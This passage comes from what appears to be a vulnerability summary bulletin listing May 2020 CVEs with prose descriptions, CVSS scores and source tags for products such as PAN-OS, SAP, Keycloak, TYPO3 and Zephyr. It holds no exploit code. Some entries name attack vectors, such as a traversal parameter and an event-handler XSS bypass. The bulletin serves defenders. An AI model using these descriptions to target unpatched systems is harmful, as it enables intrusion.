  Opto 22 SoftPAC Project Version 9.6 and prior. SoftPAC does not specify the path of multiple imported .dll files. Therefore, an attacker can replace them and execute code whenever the service starts. 2020-05-14 6.8 CVE-2020-10616
MISC oracle -- iplanet_web_server ** PRODUCT NOT SUPPORTED WHEN ASSIGNED ** Oracle iPlanet Web Server 7.0.x allows image injection in the Administration console via the productNameSrc parameter to an admingui URI. This issue exists because of an incomplete fix for CVE-2012-0516. NOTE: a related support policy can be found in the www.oracle.com references attached to this CVE. 2020-05-10 4.9 CVE-2020-9314
FULLDISC
MISC
MISC
MISC oracle -- iplanet_web_server
  ** PRODUCT NOT SUPPORTED WHEN ASSIGNED ** Oracle iPlanet Web Server 7.0.x has Incorrect Access Control for admingui/version URIs in the Administration console, as demonstrated by unauthenticated read access to encryption keys. NOTE: a related support policy can be found in the www.oracle.com references attached to this CVE. 2020-05-10 5 CVE-2020-9315
FULLDISC
MISC
MISC
MISC palo_alto_networks -- pan-os
  The GlobalProtect Portal feature in PAN-OS does not set a new session identifier after a successful user login, which allows session fixation attacks, if an attacker is able to control a user's session ID. This issue affects: All PAN-OS 7.1 and 8.0 versions; PAN-OS 8.1 versions earlier than 8.1.14; PAN-OS 9.0 versions earlier than 9.0.8. 2020-05-13 5.5 CVE-2020-1993
CONFIRM palo_alto_networks -- pan-os
  A cross-site scripting (XSS) vulnerability exists when visiting malicious websites with the Palo Alto Networks GlobalProtect Clientless VPN that can compromise the user's active session. This issue affects: PAN-OS 7.1 versions earlier than 7.1.26; PAN-OS 8.1 versions earlier than 8.1.13; PAN-OS 9.0 versions earlier than 9.0.7; All versions of PAN-OS 8.0. 2020-05-13 4.3 CVE-2020-2005
CONFIRM palo_alto_networks -- pan-os
  A NULL pointer dereference vulnerability in Palo Alto Networks PAN-OS allows an authenticated administrator to send a request that causes the rasmgr daemon to crash. Repeated attempts to send this request result in denial of service to all PAN-OS services by restarting the device and putting it into maintenance mode. This issue affects: PAN-OS 9.1 versions earlier than 9.1.2. 2020-05-13 6.8 CVE-2020-1995
CONFIRM palo_alto_networks -- pan-os_for_panorama Improper restriction of XML external entity reference ('XXE') vulnerability in Palo Alto Networks Panorama management service allows remote unauthenticated attackers with network access to the Panorama management interface to read arbitrary files on the system. This issue affects: All versions of PAN-OS for Panorama 7.1 and 8.0; PAN-OS for Panorama 8.1 versions earlier than 8.1.13; PAN-OS for Panorama 9.0 versions earlier than 9.0.7. 2020-05-13 5 CVE-2020-2012
CONFIRM

palo_alto_networks -- pan-os

 

A DOM-Based Cross Site Scripting Vulnerability exists in PAN-OS and Panorama Management Web Interfaces. A remote attacker able to convince an authenticated administrator to click on a crafted link to PAN-OS and Panorama Web Interfaces could execute arbitrary JavaScript code in the administrator's browser and perform administrative actions. This issue affects: PAN-OS 7.1 versions earlier than 7.1.26; PAN-OS 8.1 versions earlier than 8.1.13; PAN-OS 9.0 versions earlier than 9.0.6; All versions of PAN-OS 8.0. 2020-05-13 4.3 CVE-2020-2017
CONFIRM pixel_&_tonic -- craft_cms
  In the SEOmatic plugin before 3.2.49 for Craft CMS, helpers/DynamicMeta.php does not properly sanitize the URL. This leads to Server-Side Template Injection and credentials disclosure via a crafted Twig template after a semicolon. 2020-05-11 5 CVE-2020-12790
MISC
MISC
MISC
MISC plex -- media_server
  Deserialization of Untrusted Data in Plex Media Server on Windows allows a remote, authenticated attacker to execute arbitrary Python code. 2020-05-08 6.5 CVE-2020-5741
MISC python_packaging_authority -- python_package_installer An issue was discovered in pip (all versions) because it installs the version with the highest version number, even if the user had intended to obtain a private package from a private index. This only affects use of the --extra-index-url option, and exploitation requires that the package does not already exist in the public index (and thus the attacker can put the package there with an arbitrary version number). 2020-05-08 6.8 CVE-2018-20225
MISC
MISC red_hat -- ansible_engine
  A flaw was found in the Ansible Engine affecting Ansible Engine versions 2.7.x before 2.7.17 and 2.8.x before 2.8.11 and 2.9.x before 2.9.7 as well as Ansible Tower before and including versions 3.4.5 and 3.5.5 and 3.6.3 when the ldap_attr and ldap_entry community modules are used. The issue discloses the LDAP bind password to stdout or a log file if a playbook task is written using the bind_pw in the parameters field. The highest threat from this vulnerability is data confidentiality. 2020-05-12 5 CVE-2020-1746
CONFIRM
CONFIRM red_hat -- jboss_keycloak
  A flaw was found in the reset credential flow in all Keycloak versions before 8.0.0. This flaw allows an attacker to gain unauthorized access to the application. 2020-05-12 6.5 CVE-2020-1718
CONFIRM red_hat -- jboss_keycloak
  A flaw was found in Keycloak in versions before 9.0.2. This flaw allows a malicious user that is currently logged in, to see the personal information of a previously logged out user in the account manager section. 2020-05-11 4 CVE-2020-1724
CONFIRM red_hat -- jboss_keycloak
  A flaw was found in the Keycloak admin console, where the realm management interface permits a script to be set via the policy. This flaw allows an attacker with authenticated user and realm management permissions to configure a malicious script to trigger and execute arbitrary code with the permissions of the application user. 2020-05-08 6.5 CVE-2019-10170
CONFIRM red_hat -- jboss_keycloak
  A flaw was found in Keycloak before version 11.0.0, where the code base contains usages of ObjectInputStream without type checks. This flaw allows an attacker to inject arbitrarily serialized Java Objects, which would then get deserialized in a privileged context and potentially lead to remote code execution. 2020-05-13 6.5 CVE-2020-1714
CONFIRM
CONFIRM red_hat -- jboss_keycloak
  A flaw was found in Keycloak’s user-managed access interface, where it would permit a script to be set in the UMA policy. This flaw allows an authenticated attacker with UMA permissions to configure a malicious script to trigger and execute arbitrary code with the permissions of the user running application. 2020-05-08 6.5 CVE-2019-10169
CONFIRM red_hat -- openshift_container_platform
  A flaw was found in OpenShift Container Platform where OAuth tokens are not encrypted when the encryption of data at rest is enabled. This flaw allows an attacker with access to a backup to obtain OAuth tokens and then use them to log into the cluster as any user who logged into the cluster via the WebUI or via the command line in the last 24 hours. Once the backup is older than 24 hours the OAuth tokens are no longer valid. 2020-05-12 4.6 CVE-2020-10706
CONFIRM ruby_on_rails -- active_resource
  There is a possible information disclosure issue in Active Resource <v5.1.1 that could allow an attacker to create specially crafted requests to access data in an unexpected way and possibly leak information. 2020-05-12 5 CVE-2020-8151
MISC

samsung -- multiple_mobile_devices

An issue was discovered on Samsung mobile devices with Q(10.0) software. Attackers can bypass the locked-state protection mechanism and designate a different preferred SIM card. The Samsung ID is SVE-2020-16594 (May 2020). 2020-05-11 5 CVE-2020-12748
CONFIRM samsung -- multiple_mobile_devices
  An issue was discovered on Samsung mobile devices with Q(10.0) software. Attackers can bypass Factory Reset Protection (FRP) via SPEN. The Samsung ID is SVE-2020-17019 (May 2020). 2020-05-11 5 CVE-2020-12750
CONFIRM samsung -- multiple_mobile_devices
  An issue was discovered on Samsung mobile devices with O(8.X), P(9.0), and Q(10.0) software. The Quram image codec library allows attackers to overwrite memory and execute arbitrary code via crafted JPEG data that is mishandled during decoding. The Samsung ID is SVE-2020-16943 (May 2020). 2020-05-11 6.8 CVE-2020-12751
CONFIRM samsung -- multiple_mobile_devices
  An issue was discovered on Samsung mobile devices with P(9.0) and Q(10.0) (with TEEGRIS) software. Attackers can determine user credentials via a brute-force attack against the Gatekeeper trustlet. The Samsung ID is SVE-2020-16908 (May 2020). 2020-05-11 5 CVE-2020-12752
CONFIRM samsung -- multiple_mobile_devices
  An issue was discovered on Samsung mobile devices with P(9.0) (Exynos chipsets) software. The S.LSI Wi-Fi drivers have a buffer overflow. The Samsung ID is SVE-2020-16906 (May 2020). 2020-05-11 4.6 CVE-2020-12749
CONFIRM samsung -- multiple_mobile_devices
  An issue was discovered on Samsung mobile devices with Q(10.0) software. Attackers can bypass the locked-state protection mechanism and access clipboard content via USSD. The Samsung ID is SVE-2019-16556 (May 2020). 2020-05-11 5 CVE-2020-12745
CONFIRM

sap -- adaptive_server_enterprise

SAP Adaptive Server Enterprise (Backup Server), version 16.0, does not perform the necessary validation checks for an authenticated user while executing DUMP or LOAD command allowing arbitrary code execution or Code Injection. 2020-05-12 6.5 CVE-2020-6248
MISC
MISC

sap -- adaptive_server_enterprise

Under certain conditions, SAP Adaptive Server Enterprise (Web Services), versions 15.7, 16.0, allows an authenticated user to execute crafted database queries to elevate their privileges, modify database objects, or execute commands they are not otherwise authorized to execute, leading to SQL Injection. 2020-05-12 6.5 CVE-2020-6253
MISC
MISC

sap -- adaptive_server_enterprise

Under certain conditions, SAP Adaptive Server Enterprise (XP Server on Windows Platform), versions 15.7, 16.0, does not perform the necessary checks for an authenticated user while executing the extended stored procedure, allowing an attacker to read, modify, delete restricted data on connected servers, leading to Code Injection. 2020-05-12 6.5 CVE-2020-6243
MISC
MISC sap -- adaptive_server_enterprise
  SAP Adaptive Server Enterprise, version 16.0, allows an authenticated attacker to exploit certain misconfigured endpoints exposed over the adjacent network, to read system administrator password leading to Information Disclosure. This could help the attacker to read/write any data and even stop the server like an administrator. 2020-05-12 6.7 CVE-2020-6250
MISC
MISC sap -- adaptive_server_enterprise
  Under certain conditions SAP Adaptive Server Enterprise, versions 15.7, 16.0, allows an attacker to access information which would otherwise be restricted leading to Missing Authorization Check. 2020-05-12 4 CVE-2020-6259
MISC
MISC sap -- adaptive_server_enterprise
  Under certain conditions SAP Adaptive Server Enterprise (Cockpit), version 16.0, allows an attacker with access to local network, to get sensitive and confidential information, leading to Information Disclosure. It can be used to get user account credentials, tamper with system data and impact system availability. 2020-05-12 5.2 CVE-2020-6252
MISC
MISC sap -- adaptive_server_enterprise
  SAP Adaptive Server Enterprise, version 16.0, allows an authenticated user to execute crafted database queries to elevate privileges of users in the system, leading to SQL Injection. 2020-05-12 6.5 CVE-2020-6241
MISC
MISC sap -- application_server_abap
  Service Data Download in SAP Application Server ABAP (ST-PI, before versions 2008_1_46C, 2008_1_620, 2008_1_640, 2008_1_700, 2008_1_710, 740) allows an attacker to inject code that can be executed by the application. An attacker could thereby control the behavior of the application and the whole ABAP system leading to Code Injection. 2020-05-12 6.5 CVE-2020-6262
MISC
MISC sap -- business_objects_intelligence_platform
  SAP Business Objects Business Intelligence Platform, version 4.2, allows an attacker with access to local instance, to inject file or code that can be executed by the application due to Improper Control of Resource Identifiers. 2020-05-12 4.6 CVE-2020-6245
MISC
MISC sap -- business_objects_intelligence_platform
  SAP Business Objects Business Intelligence Platform, version 4.2, allows an unauthenticated attacker to prevent legitimate users from accessing a service. Using a specially crafted request, the attacker can crash or flood the Central Management Server, thereby impacting system availability. 2020-05-12 5 CVE-2020-6247
MISC
MISC sap -- business_objects_intelligence_platform
  Under certain conditions or error scenarios SAP Business Objects Business Intelligence Platform, version 4.2, allows an attacker to access information which would otherwise be restricted. 2020-05-12 5 CVE-2020-6251
MISC
MISC sap -- enterprise_threat_detection
  SAP Enterprise Threat Detection, versions 1.0, 2.0, does not sufficiently encode error response pages in case of errors, allowing XSS payload reflecting in the response, leading to reflected Cross Site Scripting. 2020-05-12 4.3 CVE-2020-6254
MISC
MISC sap -- identity_management
  SAP Identity Management, version 8.0, does not perform necessary authorization checks for an authenticated user, allowing the attacker to view certain sensitive information of the victim, leading to Missing Authorization Check. 2020-05-12 4 CVE-2020-6258
MISC
MISC sap -- master_data_governance The use of an admin backend report within SAP Master Data Governance, versions - S4CORE 101, S4FND 102, 103, 104, SAP_BS_FND 748; allows an attacker to execute crafted database queries, exposing the backend database, leading to SQL Injection. 2020-05-12 6.5 CVE-2020-6249
MISC
MISC sap -- master_data_governance
  SAP Master Data Governance, versions - 748, 749, 750, 751, 752, 800, 801, 802, 803, 804, allows users to display change request details without having required authorizations, due to Missing Authorization Check. 2020-05-12 4 CVE-2020-6256
MISC
MISC sap -- netweaver_as_abap
  SAP NetWeaver AS ABAP (Web Dynpro ABAP), versions (SAP_UI 750, 752, 753, 754 and SAP_BASIS 700, 710, 730, 731, 804) allows an unauthenticated attacker to prevent legitimate users from accessing a service, either by crashing or flooding the service leading to Denial of Service 2020-05-12 5 CVE-2020-6240
MISC
MISC six_apart -- multiple_movable_type_products
  Movable Type series (Movable Type 7 r.4606 (7.2.1) and earlier (Movable Type 7), Movable Type Advanced 7 r.4606 (7.2.1) and earlier (Movable Type Advanced 7), Movable Type for AWS 7 r.4606 (7.2.1) and earlier (Movable Type for AWS 7), Movable Type 6.5.3 and earlier (Movable Type 6.5), Movable Type Advanced 6.5.3 and earlier (Movable Type Advanced 6.5), Movable Type 6.3.11 and earlier (Movable Type 6.3), Movable Type Advanced 6.3.11 and earlier (Movable Type 6.3), Movable Type Premium 1.29 and earlier, and Movable Type Premium Advanced 1.29 and earlier) allow remote authenticated attackers to upload arbitrary files and execute a php script via unspecified vectors. 2020-05-14 6.5 CVE-2020-5577
MISC
MISC six_apart -- multiple_movable_type_products
  Cross-site scripting vulnerability in Movable Type series (Movable Type 7 r.4606 (7.2.1) and earlier (Movable Type 7), Movable Type Advanced 7 r.4606 (7.2.1) and earlier (Movable Type Advanced 7), Movable Type for AWS 7 r.4606 (7.2.1) and earlier (Movable Type for AWS 7), Movable Type 6.5.3 and earlier (Movable Type 6.5), Movable Type Advanced 6.5.3 and earlier (Movable Type Advanced 6.5), Movable Type 6.3.11 and earlier (Movable Type 6.3), Movable Type Advanced 6.3.11 and earlier (Movable Type 6.3), Movable Type Premium 1.29 and earlier, and Movable Type Premium Advanced 1.29 and earlier) allows remote attackers to inject arbitrary script or HTML via unspecified vectors. 2020-05-14 4.3 CVE-2020-5575
MISC
MISC six_apart -- multiple_movable_type_products
  HTML attribute value injection vulnerability in Movable Type series (Movable Type 7 r.4606 (7.2.1) and earlier (Movable Type 7), Movable Type Advanced 7 r.4606 (7.2.1) and earlier (Movable Type Advanced 7), Movable Type for AWS 7 r.4606 (7.2.1) and earlier (Movable Type for AWS 7), Movable Type 6.5.3 and earlier (Movable Type 6.5), Movable Type Advanced 6.5.3 and earlier (Movable Type Advanced 6.5), Movable Type 6.3.11 and earlier (Movable Type 6.3), Movable Type Advanced 6.3.11 and earlier (Movable Type 6.3), Movable Type Premium 1.29 and earlier, and Movable Type Premium Advanced 1.29 and earlier) allows remote attackers to inject arbitrary HTML attribute value via unspecified vectors. 2020-05-14 5 CVE-2020-5574
MISC
MISC six_apart -- multiple_movable_type_products
  Cross-site request forgery (CSRF) vulnerability in Movable Type series (Movable Type 7 r.4606 (7.2.1) and earlier (Movable Type 7), Movable Type Advanced 7 r.4606 (7.2.1) and earlier (Movable Type Advanced 7), Movable Type for AWS 7 r.4606 (7.2.1) and earlier (Movable Type for AWS 7), Movable Type 6.5.3 and earlier (Movable Type 6.5), Movable Type Advanced 6.5.3 and earlier (Movable Type Advanced 6.5), Movable Type 6.3.11 and earlier (Movable Type 6.3), Movable Type Advanced 6.3.11 and earlier (Movable Type 6.3), Movable Type Premium 1.29 and earlier, and Movable Type Premium Advanced 1.29 and earlier) allows remote attackers to hijack the authentication of administrators via unspecified vectors. 2020-05-14 6.8 CVE-2020-5576
MISC
MISC solis_miolo -- solis_miolo Solis Miolo 2.0 allows index.php?module=install&action=view&item= Directory Traversal. 2020-05-09 5 CVE-2020-12765
CONFIRM suse -- opensuse
  A Improper Neutralization of Input During Web Page Generation vulnerability in open-build-service allows remote attackers to store arbitrary JS code to cause XSS. This issue affects: openSUSE open-build-service versions prior to 7cc32c8e2ff7290698e101d9a80a9dc29a5500fb. 2020-05-13 4.3 CVE-2020-8020
CONFIRM symantec -- endpoint_protection
  Symantec Endpoint Protection, prior to 14.3, may not respect file permissions when writing to log files that are replaced by symbolic links, which can lead to a potential elevation of privilege. 2020-05-11 4.6 CVE-2020-5837
MISC symantec -- endpoint_protection
  Symantec Endpoint Protection, prior to 14.3, can potentially reset the ACLs on a file as a limited user while Symantec Endpoint Protection's Tamper Protection feature is disabled. 2020-05-11 4.4 CVE-2020-5836
MISC symantec -- endpoint_protection_manager
  Symantec Endpoint Protection Manager, prior to 14.3, may be susceptible to a directory traversal attack that could allow a remote actor to determine the size of files in the directory. 2020-05-11 5 CVE-2020-5834
MISC symantec -- endpoint_protection_manager
  Symantec Endpoint Protection Manager, prior to 14.3, has a race condition in client remote deployment which may result in an elevation of privilege on the remote machine. 2020-05-11 4.4 CVE-2020-5835
MISC tobesoft -- xplatform A use-after-free vulnerability in the TOBESOFT XPLATFORM versions 9.1 to 9.2.2 may lead to code execution on a system running it. 2020-05-11 6.8 CVE-2019-19162
MISC transmission -- transmission
  Use-after-free in libtransmission/variant.c in Transmission before 3.00 allows remote attackers to cause a denial of service (crash) or possibly execute arbitrary code via a crafted torrent file. 2020-05-15 6.8 CVE-2018-10756
MISC
MISC tyler_technologies -- eagle
  TylerTech Eagle 2018.3.11 deserializes untrusted user input, resulting in remote code execution via a crafted Java object to the recorder/ServiceManager?service=tyler.empire.settings.SettingManager URI. 2020-05-13 6.5 CVE-2019-16112
MISC

typo3 -- typo3

The direct_mail extension through 5.2.3 for TYPO3 allows Information Disclosure via a newsletter subscriber data Special Query. 2020-05-13 4 CVE-2020-12700
MISC
CONFIRM typo3 -- typo3
  In TYPO3 CMS versions 10.4.0 and 10.4.1, it has been discovered that time-based attacks can be used with the password reset functionality for backend users. This allows an attacker to mount user enumeration based on email addresses assigned to backend user accounts. This has been fixed in 10.4.2. 2020-05-13 4.3 CVE-2020-11063
CONFIRM typo3 -- typo3
  In TYPO3 CMS 9.0.0 through 9.5.16 and 10.0.0 through 10.4.1, it has been discovered that the backend user interface and install tool are vulnerable to a same-site request forgery. A backend user can be tricked into interacting with a malicious resource an attacker previously managed to upload to the web server. Scripts are then executed with the privileges of the victims' user session. In a worst-case scenario, new admin users can be created which can directly be used by an attacker. The vulnerability is basically a cross-site request forgery (CSRF) triggered by a cross-site scripting vulnerability (XSS) - but happens on the same target host - thus, it's actually a same-site request forgery. Malicious payload such as HTML containing JavaScript might be provided by either an authenticated backend user or by a non-authenticated user using a third party extension, e.g. file upload in a contact form with knowing the target location. To be successful, the attacked victim requires an active and valid backend or install tool user session at the time of the attack. This has been fixed in 9.5.17 and 10.4.2. The deployment of additional mitigation techniques is suggested as described below. - Sudo Mode Extension This TYPO3 extension intercepts modifications to security relevant database tables, e.g. those storing user accounts or storages of the file abstraction layer. Modifications need to confirmed again by the acting user providing their password again. This technique is known as sudo mode. This way, unintended actions happening in the background can be mitigated. - https://github.com/FriendsOfTYPO3/sudo-mode - https://extensions.typo3.org/extension/sudo_mode - Content Security Policy Content Security Policies tell (modern) browsers how resources served a particular site are handled. It is also possible to disallow script executions for specific locations. In a TYPO3 context, it is suggested to disallow direct script execution at least for locations /fileadmin/ and /uploads/. 2020-05-14 6.8 CVE-2020-11069
CONFIRM typo3 -- typo3
  In TYPO3 CMS greater than or equal to 9.0.0 and less than 9.5.17 and greater than or equal to 10.0.0 and less than 10.4.2, calling unserialize() on malicious user-submitted content can lead to modification of dynamically-determined object attributes and result in triggering deletion of an arbitrary directory in the file system, if it is writable for the web server. It can also trigger message submission via email using the identity of the web site (mail relay). Another insecure deserialization vulnerability is required to actually exploit mentioned aspects. This has been fixed in 9.5.17 and 10.4.2. 2020-05-14 6.4 CVE-2020-11066
CONFIRM typo3 -- typo3
  The direct_mail extension through 5.2.3 for TYPO3 allows Denial of Service via log entries. 2020-05-13 5 CVE-2020-12697
MISC
CONFIRM typo3 -- typo3
  In TYPO3 CMS 9.0.0 through 9.5.16 and 10.0.0 through 10.4.1, it has been discovered that backend user settings (in $BE_USER->uc) are vulnerable to insecure deserialization. In combination with vulnerabilities of third party components, this can lead to remote code execution. A valid backend user account is needed to exploit this vulnerability. This has been fixed in 9.5.17 and 10.4.2. 2020-05-14 6 CVE-2020-11067
CONFIRM typo3 -- typo3
  The direct_mail extension through 5.2.3 for TYPO3 has Broken Access Control for newsletter subscriber tables. 2020-05-13 4 CVE-2020-12698
MISC
CONFIRM typo3 -- typo3
  The direct_mail extension through 5.2.3 for TYPO3 has an Open Redirect via jumpUrl. 2020-05-13 5.8 CVE-2020-12699
MISC
CONFIRM veritas -- aptare
  Veritas APTARE versions prior to 10.4 did not perform adequate authorization checks. An authenticated user could gain unauthorized access to sensitive information or functionality by manipulating specific parameters within the application. 2020-05-14 6.5 CVE-2020-12875
MISC veritas -- aptare
  Veritas APTARE versions prior to 10.4 allowed remote users to access several unintended files on the server. This vulnerability only impacts Windows server deployments. 2020-05-14 5 CVE-2020-12876
MISC veritas -- aptare
  Veritas APTARE versions prior to 10.4 allowed sensitive information to be accessible without authentication. 2020-05-14 5 CVE-2020-12877
MISC vmware -- pivotal_concourse
  Pivotal Concourse, most versions prior to 6.0.0, allows redirects to untrusted websites in its login flow. A remote unauthenticated attacker could convince a user to click on a link using the OAuth redirect link with an untrusted website and gain access to that user's access token in Concourse. (This issue is similar to, but distinct from, CVE-2018-15798.) 2020-05-14 5.8 CVE-2020-5409
CONFIRM vmware -- spring_security
  Spring Security versions 5.2.x prior to 5.2.4 and 5.3.x prior to 5.3.2 contain a signature wrapping vulnerability during SAML response validation. When using the spring-security-saml2-service-provider component, a malicious user can carefully modify an otherwise valid SAML response and append an arbitrary assertion that Spring Security will accept as valid. 2020-05-13 6.5 CVE-2020-5407
MLIST
CONFIRM western_digital -- mycloud_home
  The Western Digital WD Discovery application before 3.8.229 for MyCloud Home on Windows and macOS is vulnerable to CSRF, with impacts such as stealing data, modifying disk contents, or exhausting disk space. 2020-05-13 6.8 CVE-2020-12427
MISC
CONFIRM wso2 -- multiple_products
  XXE during an EventPublisher update can occur in Management Console in WSO2 API Manager 3.0.0 and earlier, API Manager Analytics 2.5.0 and earlier, API Microgateway 2.2.0, Enterprise Integrator 6.4.0 and earlier, IS as Key Manager 5.9.0 and earlier, Identity Server 5.9.0 and earlier, and Identity Server Analytics 5.6.0 and earlier. 2020-05-08 6.5 CVE-2020-12719
MISC zephyrproject -- zephyr Multiple syscalls in the Kscan subsystem perform insufficient argument validation, allowing code executing in userspace to potentially gain elevated privileges. See NCC-ZEP-006 This issue affects: zephyrproject-rtos zephyr version 2.1.0 and later versions. 2020-05-11 4.6 CVE-2020-10058
MISC
MISC
MISC
MISC zephyrproject -- zephyr
  Out-of-bounds Write in the USB Mass Storage memoryWrite handler with unaligned Sizes See NCC-ZEP-024, NCC-ZEP-025, NCC-ZEP-026 This issue affects: zephyrproject-rtos zephyr version 1.14.1 and later versions. version 2.1.0 and later versions. 2020-05-11 4.6 CVE-2020-10021
MISC
MISC
MISC
MISC
MISC zephyrproject -- zephyr
  The UpdateHub module disables DTLS peer checking, which allows for a man in the middle attack. This is mitigated by firmware images requiring valid signatures. However, there is no benefit to using DTLS without the peer checking. See NCC-ZEP-018 This issue affects: zephyrproject-rtos zephyr version 2.1.0 and later versions. 2020-05-11 5.8 CVE-2020-10059
MISC
MISC
MISC
MISC
MISC zephyrproject -- zephyr
  The shell subsystem contains a buffer overflow, whereby an adversary with physical access to the device is able to cause a memory corruption, resulting in denial of service or possibly code execution within the Zephyr kernel. See NCC-NCC-019 This issue affects: zephyrproject-rtos zephyr version 1.14.0 and later versions. version 2.1.0 and later versions. 2020-05-11 4.6 CVE-2020-10023
MISC
MISC
MISC
MISC
MISC zephyrproject -- zephyr
  In updatehub_probe, right after JSON parsing is complete, objects\[1] is accessed from the output structure in two different places. If the JSON contained less than two elements, this access would reference unitialized stack memory. This could result in a crash, denial of service, or possibly an information leak. Recommend disabling updatehub until such a time as a fix can be made available. Provided the fix in CVE-2020-10059 is applied, the attack requires compromise of the server. See NCC-ZEP-030 This issue affects: zephyrproject-rtos zephyr version 2.1.0 and later versions. version 2.2.0 and later versions. 2020-05-11 5.5 CVE-2020-10060
MISC
MISC zephyrproject -- zephyr
  Multiple syscalls with insufficient argument validation See NCC-ZEP-006 This issue affects: zephyrproject-rtos zephyr version 1.14.0 and later versions. version 2.1.0 and later versions. 2020-05-11 4.6 CVE-2020-10028
MISC
MISC
MISC
MISC
MISC zoho -- manageengine_datasecurity_plus
  The DataEngine Xnode Server application in Zoho ManageEngine DataSecurity Plus prior to 6.0.1 does not validate the database schema name when handling a DR-SCHEMA-SYNC request. This allows an authenticated attacker to execute code in the context of the product by writing a JSP file to the webroot directory via directory traversal. 2020-05-08 6.5 CVE-2020-11531
MISC
MISC Back to top

 

Low Vulnerabilities Primary
Vendor -- Product Description Published CVSS Score Source & Patch Info covidsafe -- covidsafe_for_ios
  The COVIDSafe (Australia) app 1.0 and 1.1 for iOS allows a remote attacker to crash the app, and consequently interfere with COVID-19 contact tracing, via a Bluetooth advertisement containing manufacturer data that is too short. This occurs because of an erroneous OpenTrace manuData.subdata call. The ABTraceTogether (Alberta), ProteGO (Poland), and TraceTogether (Singapore) apps were also affected. 2020-05-14 3.3 CVE-2020-12717
MISC freerdp -- freerdp In FreeRDP after 1.1 and before 2.0.0, a stream out-of-bounds seek in rdp_read_font_capability_set could lead to a later out-of-bounds read. As a result, a manipulated client or server might force a disconnect due to an invalid data read. This has been fixed in 2.0.0. 2020-05-12 3.5 CVE-2020-11058
MISC
MISC
CONFIRM glpi_project -- glpi
  In GLPI after 0.68.1 and before 9.4.6, multiple reflexive XSS occur in Dropdown endpoints due to an invalid Content-Type. This has been fixed in version 9.4.6. 2020-05-12 3.5 CVE-2020-11062
MISC
CONFIRM

google -- android

In onShowingStateChanged of KeyguardStateMonitor.java, there is a possible inappropriate read due to a logic error. This could lead to local information disclosure of keyguard-protected data with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10Android ID: A-144430870 2020-05-14 2.1 CVE-2020-0104
MISC google -- android
  In getCellLocation of PhoneInterfaceManager.java, there is a possible permission bypass due to a missing SDK version check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-148414207 2020-05-14 2.1 CVE-2020-0106
MISC google -- android
  In BnCrypto::onTransact of ICrypto.cpp, there is a possible information disclosure due to uninitialized data. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9 Android-10Android ID: A-144767096 2020-05-14 2.1 CVE-2020-0101
MISC ibm -- api_connect
  IBM API Connect V2018.4.1.0 through 2018.4.1.10 could allow a remote attacker to hijack the clicking action of the victim. By persuading a victim to visit a malicious Web site, a remote attacker could exploit this vulnerability to hijack the victim's click actions and possibly launch further attacks against the victim. IBM X-Force ID: 174859. 2020-05-12 3.5 CVE-2020-4195
XF
CONFIRM kde -- kde
  fishProtocol::establishConnection in fish/fish.cpp in KDE kio-extras through 20.04.0 makes a cacheAuthentication call even if the user had not set the keepPassword option. This may lead to unintended KWallet storage of a password. 2020-05-09 2.1 CVE-2020-12755
CONFIRM linux -- linux_kernel An issue was discovered in the Linux kernel before 5.6. svm_cpu_uninit in arch/x86/kvm/svm.c has a memory leak, aka CID-d80b64ff297e. 2020-05-09 2.1 CVE-2020-12768
CONFIRM
CONFIRM nextcloud -- nextcloud_server
  An outdated 3rd party library in the Files PDF viewer for Nextcloud Server 18.0.2 caused a Cross-site scripting vulnerability when opening a malicious PDF. 2020-05-12 3.5 CVE-2020-8155
SUSE
SUSE
MISC opto_22 -- softpac_project
  Opto 22 SoftPAC Project Version 9.6 and prior. SoftPAC’s firmware files’ signatures are not verified upon firmware update. This allows an attacker to replace legitimate firmware files with malicious files. 2020-05-14 3.5 CVE-2020-12046
MISC palo_alto_networks -- globalprotect_app Under certain circumstances a user's password may be logged in cleartext in the PanGPS.log diagnostic file when logs are collected for troubleshooting on GlobalProtect app (also known as GlobalProtect Agent) for MacOS and Windows. For this issue to occur all of these conditions must be true: (1) 'Save User Credential' option should be set to 'Yes' in the GlobalProtect Portal's Agent configuration, (2) the GlobalProtect user manually selects a gateway, (3) and the logging level is set to 'Dump' while collecting troubleshooting logs. This issue does not affect GlobalProtect app on other platforms (for example iOS/Android/Linux). This issue affects GlobalProtect app 5.0 versions earlier than 5.0.9, GlobalProtect app 5.1 versions earlier than 5.1.2 on Windows or MacOS. Since becoming aware of the issue, Palo Alto Networks has safely deleted all the known GlobalProtectLogs zip files sent by customers with the credentials. We now filter and remove these credentials from all files sent to Customer Support. The GlobalProtectLogs zip files uploaded to Palo Alto Networks systems were only accessible by authorized personnel with valid Palo Alto Networks credentials. We do not have any evidence of malicious access or use of these credentials. 2020-05-13 1.7 CVE-2020-2004
CONFIRM php-fusion -- php-fusion
  In administration/comments.php in PHP-Fusion 9.03.50, an authenticated attacker can take advantage of a stored XSS vulnerability in the Preview Comment feature. The protection mechanism can be bypassed by using HTML event handlers such as ontoggle. 2020-05-08 3.5 CVE-2020-12718
MISC red_hat -- jboss_keycloak
  A flaw was found in keycloak in versions before 9.0.0. A logged exception in the HttpMethod class may leak the password given as parameter. The highest threat from this vulnerability is to data confidentiality. 2020-05-11 2.1 CVE-2020-1698
CONFIRM samsung -- multiple_mobile_devices
  Some Broadcom chips mishandle Bluetooth random-number generation because a low-entropy Pseudo Random Number Generator (PRNG) is used in situations where a Hardware Random Number Generator (HRNG) should have been used to prevent spoofing. This affects, for example, Samsung Galaxy S8, S8+, and Note8 devices with the BCM4361 chipset. The Samsung ID is SVE-2020-16882 (May 2020). 2020-05-08 3.3 CVE-2020-6616
MISC
MISC
MISC
CONFIRM
MISC
MISC

sap -- business_objects_business_intelligence_platform

SAP Business Objects Business Intelligence Platform (CMC and BI Launchpad) 4.2 does not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting vulnerability. 2020-05-12 3.5 CVE-2020-6257
MISC
MISC shopizer -- shopizer
  In Shopizer before version 2.11.0, a script can be injected in various forms and saved in the database, then executed when information is fetched from backend. This has been patched in version 2.11.0. 2020-05-08 3.5 CVE-2020-11006
MISC
CONFIRM symantec -- endpoint_protection_manager
  Symantec Endpoint Protection Manager, prior to 14.3, may be susceptible to an out of bounds vulnerability, which is a type of issue that results in an existing application reading memory outside of the bounds of the memory that had been allocated to the program. 2020-05-11 2.1 CVE-2020-5833
MISC symantec -- it_analytics
